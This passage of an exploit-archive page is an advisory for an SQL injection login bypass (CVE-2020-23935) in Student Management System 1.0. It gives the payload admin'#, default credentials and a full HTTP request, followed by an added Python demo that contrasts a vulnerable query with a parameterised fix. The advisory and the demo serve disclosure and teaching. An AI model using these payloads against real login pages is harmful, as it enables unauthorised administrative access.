/>Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />0xSaudi<br /></pre><br /></body><br /></html><br /></code></pre>
<pre><code># Exploit Title: Student Management System 1.0 - SQLi Authentication Bypass<br /># Date: 2020-07-06<br /># Exploit Author: Enes Özeser<br /># Vendor Homepage: https://www.sourcecodester.com/php/14268/student-management-system.html<br /># Version: 1.0<br /># Tested on: Windows & WampServer<br /># CVE: CVE-2020-23935<br /><br />1- Go to the following URL: http://(HOST)/admin/login.php<br />2- We can log in successfully with the SQL injection below; the # turns the rest of the query, including the password check, into a MySQL comment.<br /><br />-- Username = admin'#<br />-- Password = (Write Something)<br /><br />NOTE: Default username and password is admin:admin.<br /><br />(( HTTP Request ))<br /><br />POST /process.php HTTP/1.1<br />Host: (HOST)<br />Connection: keep-alive<br />Content-Length: 51<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://(HOST)/<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Referer: http://(HOST)/index.php?q=login<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: navigate-tinymce-scroll=%7B%7D; navigate-language=en; PHPSESSID=1asdsd3lf9u2d7e82on6rjl<br /><br />U_USERNAME=admin'#&U_PASS=123123&sidebarLogin=<br /></code></pre>
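Added example, not part of this advisory or the Employees Daily Task Management System bypass above: the login-query shape that both payloads defeat, run against an in-memory SQLite database next to its parameterised fix. The table, credentials and query text are constructed, since neither application's real query is on the page. SQLite is used because EDTMS ships on SQLite; that also shows the engine-dependence caveat, because the `admin'#` payload relies on MySQL's `#` comment (WampServer) and is a syntax error in SQLite, whereas `-- -` is accepted by both.

```python
"""Added example (not the advisory authors' code): string-built login query
versus a parameterised one, with the two payloads from the advisories."""
import sqlite3


def make_db():
    """Constructed sample database: one admin account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret-demo')")
    return con


def login_vulnerable(con, username, password):
    """String-built query: user input becomes SQL. Returns the user id or None;
    raises sqlite3.OperationalError when a payload breaks the statement."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Parameterised query: the same input is only ever compared as a value."""
    row = con.execute("SELECT id FROM users WHERE username = ? AND password = ?",
                      (username, password)).fetchone()
    return row[0] if row else None


def outcome(fn, con, username, password):
    """Summarise an attempt as 'success', 'denied' or 'error: <message>'."""
    try:
        uid = fn(con, username, password)
    except sqlite3.OperationalError as e:
        return f"error: {e}"
    return "success" if uid is not None else "denied"


if __name__ == "__main__":
    con = make_db()
    for payload in ("admin' or 1=1 -- -", "123' or 1=1 -- -", "admin'#", "admin"):
        print(f"{payload!r:24} vulnerable={outcome(login_vulnerable, con, payload, 'wrong')}"
              f"  safe={outcome(login_safe, con, payload, 'wrong')}")
```

Note that `123' or 1=1 -- -` logs in without even naming a valid user: `or 1=1` makes the WHERE clause true for every row, and the first row returned is the admin account, which is why these bypasses usually land on the highest-privileged user.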